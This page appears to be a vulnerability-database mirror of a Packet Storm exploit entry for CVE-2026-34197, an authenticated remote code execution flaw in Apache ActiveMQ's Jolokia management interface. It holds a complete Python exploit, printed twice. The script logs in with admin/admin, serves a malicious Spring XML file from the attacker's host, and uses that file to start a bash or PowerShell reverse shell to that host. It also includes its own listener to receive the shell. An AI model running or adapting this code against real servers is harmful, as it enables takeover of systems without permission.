📄 Apache ActiveMQ Jolokia Remote Code Execution_PACKETSTORM:222315

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

This is a proof of concept security research tool that evaluates a potential authenticated remote code execution pathway through the Jolokia management interface exposed by Apache ActiveMQ. The tool authenticates to the broker, discovers configuration...

Visit Original Source

Basic Information

ID PACKETSTORM:222315

Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Apache ActiveMQ Jolokia Management Interface – Authenticated Remote Code Execution Assessment Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://jolokia.org/ |
==================================================================================================================================

[+] Summary : a proof-of-concept security research tool that evaluates a potential authenticated remote code execution (RCE) pathway through the Jolokia management interface exposed by Apache ActiveMQ.
The tool authenticates to the broker, discovers configuration details, interacts with JMX operations exposed via Jolokia,
and attempts to determine whether management functionality can be abused to trigger execution of externally supplied configurations.

[+] POC : python 1.py -t 192.168.1.100 -p 8161 -u admin -P admin --lhost 192.168.1.50 --platform linux

#!/usr/bin/env python3

import requests
import json
import sys
import time
import random
import string
import argparse
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, urljoin
import os

class ActiveMQExploit:
def __init__(self, target_host, target_port=8161, username='admin', password='admin',
target_uri='/', ssl=False, broker_name=None, lhost=None, lport=4444):
"""
Initialize the ActiveMQ exploit
"""
self.target_host = target_host
self.target_port = target_port
self.username = username
self.password = password
self.target_uri = target_uri.rstrip('/')
self.ssl = ssl
self.broker_name = broker_name
self.lhost = lhost
self.lport = lport
self.http_server = None
self.server_thread = None
self.payload_executed = False
protocol = 'https' if ssl else 'http'
self.base_url = f"{protocol}://{target_host}:{target_port}{self.target_uri}"
self.session = requests.Session()
self.session.auth = (username, password)

def random_string(self, length=8):
"""Generate random string"""
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def detect_broker_name(self):
"""Auto-detect broker name if not provided"""
if self.broker_name:
print(f"[*] Using provided broker name: {self.broker_name}")
return self.broker_name

print("[*] Attempting to detect broker name...")
jolokia_url = urljoin(self.base_url, '/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=*')

try:
response = self.session.get(jolokia_url, timeout=10)

if response.status_code == 200:
data = response.json()
if data.get('status') == 200 and data.get('value'):
for mbean in data['value'].keys():
for part in mbean.split(','):
if part.startswith('brokerName='):
name = part.split('=', 1)[1]
print(f"[+] Detected broker name: {name}")
return name

print(f"[-] Could not detect broker name, using default 'localhost'")
return 'localhost'

except Exception as e:
print(f"[-] Error detecting broker name: {e}")
return 'localhost'

def remove_network_connector(self, broker_name, connector_name='NC'):
"""Remove existing network connector (cleanup)"""
print(f"[*] Attempting to remove existing connector: {connector_name}")

jolokia_url = urljoin(self.base_url, '/api/jolokia/')

body = {
'type': 'exec',
'mbean': f"org.apache.activemq:type=Broker,brokerName={broker_name}",
'operation': 'removeNetworkConnector(java.lang.String)',
'arguments': [connector_name]
}

try:
response = self.session.post(
jolokia_url,
json=body,
headers={'Content-Type': 'application/json'},
timeout=10
)

if response.status_code == 200:
print(f"[+] Successfully removed connector '{connector_name}'")
else:
print(f"[!] Connector '{connector_name}' not found or already removed")

except Exception as e:
print(f"[!] Error removing connector: {e}")

def check_authentication(self):
"""Check if authentication is working"""
print("[*] Checking authentication...")

jolokia_url = urljoin(self.base_url, '/api/jolokia/')

try:
response = self.session.get(jolokia_url, timeout=10)

if response.status_code == 200:
data = response.json()
agent = data.get('value', {}).get('agent', 'unknown')
print(f"[+] Authentication successful! Jolokia agent version: {agent}")
return True
elif response.status_code == 401:
print(f"[-] Authentication failed! Invalid credentials: {self.username}:{self.password}")
return False
elif response.status_code == 403:
print("[-] Jolokia access forbidden (403)")
return False
else:
print(f"[-] Unexpected HTTP status: {response.status_code}")
return False

except Exception as e:
print(f"[-] Connection error: {e}")
return False

def generate_payload(self, platform):
"""Generate payload based on platform"""
if platform == 'win':
payload = f"powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$client = New-Object System.Net.Sockets.TCPClient('{self.lhost}',{self.lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\""
shell = 'cmd.exe'
flag = '/c'
else:
payload = f"bash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1"
shell = '/bin/sh'
flag = '-c'

return shell, flag, payload

def create_malicious_xml(self, platform):
"""Create malicious Spring XML payload"""
bean_id = self.random_string(8)
shell, flag, command = self.generate_payload(platform)

xml_template = f'''<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="{bean_id}" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>{shell}</value>
<value>{flag}</value>
<value><![CDATA[{command}]]></value>
</list>
</constructor-arg>
</bean>
</beans>'''

return xml_template

def exploit(self, platform='linux', reverse_port=None):
"""Main exploit function"""
print("\n" + "="*60)
print("Apache ActiveMQ RCE via Jolokia (CVE-2026-34197)")
print("="*60 + "\n")
if not self.check_authentication():
print("[-] Authentication failed. Exiting...")
return False
broker_name = self.detect_broker_name()
self.remove_network_connector(broker_name)
if not self.start_http_server(platform):
print("[-] Failed to start HTTP server")
return False
connector_id = self.random_string(8)
malicious_uri = f"static:(vm://{self.random_string(8)}?brokerConfig=xbean:http://{self.lhost}:{self.http_server_port}/payload.xml)"

print(f"[*] Malicious URI: {malicious_uri}")
jolokia_url = urljoin(self.base_url, '/api/jolokia/')

exploit_body = {
'type': 'exec',
'mbean': f"org.apache.activemq:type=Broker,brokerName={broker_name}",
'operation': 'addNetworkConnector(java.lang.String)',
'arguments': [malicious_uri]
}

print(f"[*] Sending exploit request to {self.target_host}:{self.target_port}")

try:
response = self.session.post(
jolokia_url,
json=exploit_body,
headers={'Content-Type': 'application/json'},
timeout=10
)

if response.status_code == 200:
data = response.json()
if data.get('status') == 200:
print("[+] Exploit accepted by Jolokia!")
else:
print(f"[!] Jolokia returned status {data.get('status')}: {data.get('error', 'Unknown error')}")
elif response.status_code == 401:
print("[-] Authentication failed during exploit")
return False
else:
print(f"[*] Unexpected response: {response.status_code} (continuing anyway)")

except requests.exceptions.Timeout:
print("[*] Request timed out - This is expected if the payload executed successfully")
except Exception as e:
print(f"[!] Error sending exploit: {e}")

print("\n[*] Waiting for payload execution...")
print(f"[*] Make sure to listen on port {self.lport if reverse_port else self.http_server_port}")
print("[*] Check your netcat listener for the reverse shell")
while not self.payload_executed:
time.sleep(1)

return True

class ExploitHTTPHandler(BaseHTTPRequestHandler):
"""Custom HTTP handler to serve malicious XML"""

parent = None

def log_message(self, format, *args):
pass

def do_GET(self):
if self.path == '/payload.xml':
self.send_response(200)
self.send_header('Content-Type', 'application/xml')
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(self.server.xml_content.encode('utf-8'))
print("[+] Serving malicious Spring XML to target!")
if self.server.parent:
self.server.parent.payload_executed = True
else:
self.send_response(404)
self.end_headers()

def do_POST(self):
self.do_GET()

def start_http_server(self, platform):
"""Start HTTP server to host malicious XML"""
try:
self.http_server_port = 8080
self.xml_content = self.create_malicious_xml(platform)
self.server = HTTPServer(('0.0.0.0', self.http_server_port), self.ExploitHTTPHandler)
self.server.xml_content = self.xml_content
self.server.parent = self
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()

print(f"[+] HTTP server started on port {self.http_server_port}")
print(f"[+] Hosting malicious XML at: http://{self.lhost}:{self.http_server_port}/payload.xml")
return True

except Exception as e:
print(f"[-] Failed to start HTTP server: {e}")
return False

def stop_http_server(self):
"""Stop the HTTP server"""
if hasattr(self, 'server'):
print("[*] Stopping HTTP server...")
self.server.shutdown()
self.server.server_close()
self.server_thread.join()

class NetcatListener:
"""Simple netcat listener for reverse shells"""
@staticmethod
def start_listener(port):
import socket
import threading

def handle_client(client_socket, address):
print(f"[+] Connection from {address}")
while True:
try:
data = client_socket.recv(1024)
if not data:
break
print(data.decode('utf-8', errors='ignore'), end='')
cmd = input()
client_socket.send((cmd + '\n').encode())
except:
break
client_socket.close()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', port))
server.listen(5)
print(f"[*] Listening for reverse shell on port {port}...")

while True:
client, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(client, addr))
thread.start()

def main():
parser = argparse.ArgumentParser(description='Apache ActiveMQ RCE Exploit (CVE-2026-34197)')
parser.add_argument('-t', '--target', required=True, help='Target host (IP or domain)')
parser.add_argument('-p', '--port', type=int, default=8161, help='Target port (default: 8161)')
parser.add_argument('-u', '--username', default='admin', help='Jolokia username (default: admin)')
parser.add_argument('-P', '--password', default='admin', help='Jolokia password (default: admin)')
parser.add_argument('--ssl', action='store_true', help='Use HTTPS')
parser.add_argument('--broker-name', help='Broker name (auto-detected if not provided)')
parser.add_argument('--platform', choices=['linux', 'win'], default='linux', help='Target platform (default: linux)')
parser.add_argument('--lhost', required=True, help='Local host for reverse shell and HTTP server')
parser.add_argument('--lport', type=int, default=4444, help='Local port for reverse shell (default: 4444)')
parser.add_argument('--http-port', type=int, default=8080, help='HTTP server port (default: 8080)')

args = parser.parse_args()

print("""
╔═══════════════════════════════════════════════════════════╗
║ Apache ActiveMQ RCE Exploit (CVE-2026-34197) ║
║ Python Port - by indoushka ║
╚═══════════════════════════════════════════════════════════╝
""")

exploit = ActiveMQExploit(
target_host=args.target,
target_port=args.port,
username=args.username,
password=args.password,
ssl=args.ssl,
broker_name=args.broker_name,
lhost=args.lhost,
lport=args.lport
)
exploit.http_server_port = args.http_port
listener_thread = threading.Thread(target=NetcatListener.start_listener, args=(args.lport,))
listener_thread.daemon = True
listener_thread.start()
try:
exploit.exploit(platform=args.platform)
while True:
time.sleep(1)

except KeyboardInterrupt:
print("\n[!] Interrupted by user")
exploit.stop_http_server()
sys.exit(0)

if __name__ == '__main__':
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-01T18:17:12",
    "description": "This is a proof of concept security research tool that evaluates a potential authenticated remote code execution pathway through the Jolokia management interface exposed by Apache ActiveMQ. The tool authenticates to the broker, discovers configuration...",
    "published": "2026-06-01T00:00:00",
    "modified": "2026-06-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Apache ActiveMQ Jolokia Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222315",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-34197"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Apache ActiveMQ Jolokia Management Interface \u2013 Authenticated Remote Code Execution Assessment Tool               |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://jolokia.org/                                                                                             |\n    ==================================================================================================================================\n    \n    [+] Summary    : a proof-of-concept security research tool that evaluates a potential authenticated remote code execution (RCE) pathway through the Jolokia management interface exposed by Apache ActiveMQ. \n                     The tool authenticates to the broker, discovers configuration details, interacts with JMX operations exposed via Jolokia,\n                     and attempts to determine whether management functionality can be abused to trigger execution of externally supplied configurations.\n    \t\t\t\t \n    [+] POC        : python 1.py -t 192.168.1.100 -p 8161 -u admin -P admin --lhost 192.168.1.50 --platform linux\n    \n    #!/usr/bin/env python3\n    \n    import requests\n    import json\n    import sys\n    import time\n    import random\n    import string\n    import argparse\n    import threading\n    from http.server import HTTPServer, BaseHTTPRequestHandler\n    from urllib.parse import urlparse, urljoin\n    import os\n    \n    class ActiveMQExploit:\n        def __init__(self, target_host, target_port=8161, username='admin', password='admin', \n                     target_uri='/', ssl=False, broker_name=None, lhost=None, lport=4444):\n            \"\"\"\n            Initialize the ActiveMQ exploit\n            \"\"\"\n            self.target_host = target_host\n            self.target_port = target_port\n            self.username = username\n            self.password = password\n            self.target_uri = target_uri.rstrip('/')\n            self.ssl = ssl\n            self.broker_name = broker_name\n            self.lhost = lhost\n            self.lport = lport\n            self.http_server = None\n            self.server_thread = None\n            self.payload_executed = False\n            protocol = 'https' if ssl else 'http'\n            self.base_url = f\"{protocol}://{target_host}:{target_port}{self.target_uri}\"\n            self.session = requests.Session()\n            self.session.auth = (username, password)\n            \n        def random_string(self, length=8):\n            \"\"\"Generate random string\"\"\"\n            return ''.join(random.choices(string.ascii_letters + string.digits, k=length))\n        \n        def detect_broker_name(self):\n            \"\"\"Auto-detect broker name if not provided\"\"\"\n            if self.broker_name:\n                print(f\"[*] Using provided broker name: {self.broker_name}\")\n                return self.broker_name\n                \n            print(\"[*] Attempting to detect broker name...\")\n            jolokia_url = urljoin(self.base_url, '/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=*')\n            \n            try:\n                response = self.session.get(jolokia_url, timeout=10)\n                \n                if response.status_code == 200:\n                    data = response.json()\n                    if data.get('status') == 200 and data.get('value'):\n                        for mbean in data['value'].keys():\n                            for part in mbean.split(','):\n                                if part.startswith('brokerName='):\n                                    name = part.split('=', 1)[1]\n                                    print(f\"[+] Detected broker name: {name}\")\n                                    return name\n                \n                print(f\"[-] Could not detect broker name, using default 'localhost'\")\n                return 'localhost'\n                \n            except Exception as e:\n                print(f\"[-] Error detecting broker name: {e}\")\n                return 'localhost'\n        \n        def remove_network_connector(self, broker_name, connector_name='NC'):\n            \"\"\"Remove existing network connector (cleanup)\"\"\"\n            print(f\"[*] Attempting to remove existing connector: {connector_name}\")\n            \n            jolokia_url = urljoin(self.base_url, '/api/jolokia/')\n            \n            body = {\n                'type': 'exec',\n                'mbean': f\"org.apache.activemq:type=Broker,brokerName={broker_name}\",\n                'operation': 'removeNetworkConnector(java.lang.String)',\n                'arguments': [connector_name]\n            }\n            \n            try:\n                response = self.session.post(\n                    jolokia_url,\n                    json=body,\n                    headers={'Content-Type': 'application/json'},\n                    timeout=10\n                )\n                \n                if response.status_code == 200:\n                    print(f\"[+] Successfully removed connector '{connector_name}'\")\n                else:\n                    print(f\"[!] Connector '{connector_name}' not found or already removed\")\n                    \n            except Exception as e:\n                print(f\"[!] Error removing connector: {e}\")\n        \n        def check_authentication(self):\n            \"\"\"Check if authentication is working\"\"\"\n            print(\"[*] Checking authentication...\")\n            \n            jolokia_url = urljoin(self.base_url, '/api/jolokia/')\n            \n            try:\n                response = self.session.get(jolokia_url, timeout=10)\n                \n                if response.status_code == 200:\n                    data = response.json()\n                    agent = data.get('value', {}).get('agent', 'unknown')\n                    print(f\"[+] Authentication successful! Jolokia agent version: {agent}\")\n                    return True\n                elif response.status_code == 401:\n                    print(f\"[-] Authentication failed! Invalid credentials: {self.username}:{self.password}\")\n                    return False\n                elif response.status_code == 403:\n                    print(\"[-] Jolokia access forbidden (403)\")\n                    return False\n                else:\n                    print(f\"[-] Unexpected HTTP status: {response.status_code}\")\n                    return False\n                    \n            except Exception as e:\n                print(f\"[-] Connection error: {e}\")\n                return False\n        \n        def generate_payload(self, platform):\n            \"\"\"Generate payload based on platform\"\"\"\n            if platform == 'win':\n                payload = f\"powershell -NoP -NonI -W Hidden -Exec Bypass -Command \\\"$client = New-Object System.Net.Sockets.TCPClient('{self.lhost}',{self.lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\\\"\"\n                shell = 'cmd.exe'\n                flag = '/c'\n            else:\n                payload = f\"bash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1\"\n                shell = '/bin/sh'\n                flag = '-c'\n            \n            return shell, flag, payload\n        \n        def create_malicious_xml(self, platform):\n            \"\"\"Create malicious Spring XML payload\"\"\"\n            bean_id = self.random_string(8)\n            shell, flag, command = self.generate_payload(platform)\n            \n            xml_template = f'''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n    <beans xmlns=\"http://www.springframework.org/schema/beans\"\n           xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n           xsi:schemaLocation=\"http://www.springframework.org/schema/beans\n           http://www.springframework.org/schema/beans/spring-beans.xsd\">\n      <bean id=\"{bean_id}\" class=\"java.lang.ProcessBuilder\" init-method=\"start\">\n        <constructor-arg>\n          <list>\n            <value>{shell}</value>\n            <value>{flag}</value>\n            <value><![CDATA[{command}]]></value>\n          </list>\n        </constructor-arg>\n      </bean>\n    </beans>'''\n            \n            return xml_template\n        \n        def exploit(self, platform='linux', reverse_port=None):\n            \"\"\"Main exploit function\"\"\"\n            print(\"\\n\" + \"=\"*60)\n            print(\"Apache ActiveMQ RCE via Jolokia (CVE-2026-34197)\")\n            print(\"=\"*60 + \"\\n\")\n            if not self.check_authentication():\n                print(\"[-] Authentication failed. Exiting...\")\n                return False\n            broker_name = self.detect_broker_name()\n            self.remove_network_connector(broker_name)\n            if not self.start_http_server(platform):\n                print(\"[-] Failed to start HTTP server\")\n                return False\n            connector_id = self.random_string(8)\n            malicious_uri = f\"static:(vm://{self.random_string(8)}?brokerConfig=xbean:http://{self.lhost}:{self.http_server_port}/payload.xml)\"\n            \n            print(f\"[*] Malicious URI: {malicious_uri}\")\n            jolokia_url = urljoin(self.base_url, '/api/jolokia/')\n            \n            exploit_body = {\n                'type': 'exec',\n                'mbean': f\"org.apache.activemq:type=Broker,brokerName={broker_name}\",\n                'operation': 'addNetworkConnector(java.lang.String)',\n                'arguments': [malicious_uri]\n            }\n            \n            print(f\"[*] Sending exploit request to {self.target_host}:{self.target_port}\")\n            \n            try:\n                response = self.session.post(\n                    jolokia_url,\n                    json=exploit_body,\n                    headers={'Content-Type': 'application/json'},\n                    timeout=10\n                )\n                \n                if response.status_code == 200:\n                    data = response.json()\n                    if data.get('status') == 200:\n                        print(\"[+] Exploit accepted by Jolokia!\")\n                    else:\n                        print(f\"[!] Jolokia returned status {data.get('status')}: {data.get('error', 'Unknown error')}\")\n                elif response.status_code == 401:\n                    print(\"[-] Authentication failed during exploit\")\n                    return False\n                else:\n                    print(f\"[*] Unexpected response: {response.status_code} (continuing anyway)\")\n                    \n            except requests.exceptions.Timeout:\n                print(\"[*] Request timed out - This is expected if the payload executed successfully\")\n            except Exception as e:\n                print(f\"[!] Error sending exploit: {e}\")\n            \n            print(\"\\n[*] Waiting for payload execution...\")\n            print(f\"[*] Make sure to listen on port {self.lport if reverse_port else self.http_server_port}\")\n            print(\"[*] Check your netcat listener for the reverse shell\")\n            while not self.payload_executed:\n                time.sleep(1)\n            \n            return True\n        \n        class ExploitHTTPHandler(BaseHTTPRequestHandler):\n            \"\"\"Custom HTTP handler to serve malicious XML\"\"\"\n            \n            parent = None\n            \n            def log_message(self, format, *args):\n                pass\n            \n            def do_GET(self):\n                if self.path == '/payload.xml':\n                    self.send_response(200)\n                    self.send_header('Content-Type', 'application/xml')\n                    self.send_header('Connection', 'close')\n                    self.end_headers()\n                    self.wfile.write(self.server.xml_content.encode('utf-8'))\n                    print(\"[+] Serving malicious Spring XML to target!\")\n                    if self.server.parent:\n                        self.server.parent.payload_executed = True\n                else:\n                    self.send_response(404)\n                    self.end_headers()\n            \n            def do_POST(self):\n                self.do_GET()\n        \n        def start_http_server(self, platform):\n            \"\"\"Start HTTP server to host malicious XML\"\"\"\n            try:\n                self.http_server_port = 8080  \n                self.xml_content = self.create_malicious_xml(platform)\n                self.server = HTTPServer(('0.0.0.0', self.http_server_port), self.ExploitHTTPHandler)\n                self.server.xml_content = self.xml_content\n                self.server.parent = self\n                self.server_thread = threading.Thread(target=self.server.serve_forever)\n                self.server_thread.daemon = True\n                self.server_thread.start()\n                \n                print(f\"[+] HTTP server started on port {self.http_server_port}\")\n                print(f\"[+] Hosting malicious XML at: http://{self.lhost}:{self.http_server_port}/payload.xml\")\n                return True\n                \n            except Exception as e:\n                print(f\"[-] Failed to start HTTP server: {e}\")\n                return False\n        \n        def stop_http_server(self):\n            \"\"\"Stop the HTTP server\"\"\"\n            if hasattr(self, 'server'):\n                print(\"[*] Stopping HTTP server...\")\n                self.server.shutdown()\n                self.server.server_close()\n                self.server_thread.join()\n    \n    class NetcatListener:\n        \"\"\"Simple netcat listener for reverse shells\"\"\"\n        @staticmethod\n        def start_listener(port):\n            import socket\n            import threading\n            \n            def handle_client(client_socket, address):\n                print(f\"[+] Connection from {address}\")\n                while True:\n                    try:\n                        data = client_socket.recv(1024)\n                        if not data:\n                            break\n                        print(data.decode('utf-8', errors='ignore'), end='')\n                        cmd = input()\n                        client_socket.send((cmd + '\\n').encode())\n                    except:\n                        break\n                client_socket.close()\n            \n            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n            server.bind(('0.0.0.0', port))\n            server.listen(5)\n            print(f\"[*] Listening for reverse shell on port {port}...\")\n            \n            while True:\n                client, addr = server.accept()\n                thread = threading.Thread(target=handle_client, args=(client, addr))\n                thread.start()\n    \n    def main():\n        parser = argparse.ArgumentParser(description='Apache ActiveMQ RCE Exploit (CVE-2026-34197)')\n        parser.add_argument('-t', '--target', required=True, help='Target host (IP or domain)')\n        parser.add_argument('-p', '--port', type=int, default=8161, help='Target port (default: 8161)')\n        parser.add_argument('-u', '--username', default='admin', help='Jolokia username (default: admin)')\n        parser.add_argument('-P', '--password', default='admin', help='Jolokia password (default: admin)')\n        parser.add_argument('--ssl', action='store_true', help='Use HTTPS')\n        parser.add_argument('--broker-name', help='Broker name (auto-detected if not provided)')\n        parser.add_argument('--platform', choices=['linux', 'win'], default='linux', help='Target platform (default: linux)')\n        parser.add_argument('--lhost', required=True, help='Local host for reverse shell and HTTP server')\n        parser.add_argument('--lport', type=int, default=4444, help='Local port for reverse shell (default: 4444)')\n        parser.add_argument('--http-port', type=int, default=8080, help='HTTP server port (default: 8080)')\n        \n        args = parser.parse_args()\n        \n        print(\"\"\"\n        \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n        \u2551    Apache ActiveMQ RCE Exploit (CVE-2026-34197)           \u2551\n        \u2551            Python Port - by indoushka                     \u2551\n        \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n        \"\"\")\n    \n        exploit = ActiveMQExploit(\n            target_host=args.target,\n            target_port=args.port,\n            username=args.username,\n            password=args.password,\n            ssl=args.ssl,\n            broker_name=args.broker_name,\n            lhost=args.lhost,\n            lport=args.lport\n        )\n        exploit.http_server_port = args.http_port\n        listener_thread = threading.Thread(target=NetcatListener.start_listener, args=(args.lport,))\n        listener_thread.daemon = True\n        listener_thread.start()\n        try:\n            exploit.exploit(platform=args.platform)\n            while True:\n                time.sleep(1)\n                \n        except KeyboardInterrupt:\n            print(\"\\n[!] Interrupted by user\")\n            exploit.stop_http_server()\n            sys.exit(0)\n    \n    if __name__ == '__main__':\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/222315",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222315/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply